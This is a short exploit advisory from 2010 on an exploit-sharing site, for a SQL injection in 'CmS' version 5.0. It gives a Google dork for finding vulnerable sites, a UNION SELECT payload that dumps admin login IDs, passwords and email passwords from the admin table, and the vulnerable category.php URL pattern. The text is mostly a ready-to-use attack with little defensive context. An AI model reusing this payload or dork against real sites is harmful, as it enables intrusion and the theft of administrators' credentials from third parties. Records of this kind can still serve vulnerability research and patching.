CmS (id) SQL Injection Vulnerability

Posted on 22 April 2010
====================================
CmS (id) SQL Injection Vulnerability
====================================

-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------
 
Exploitz:
~~~~~~~
 
union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
----------------------------------------------------------------


# Inj3ct0r.com [2010-04-22]
TOP
Malware :

Last 20
Exploits :

Last 20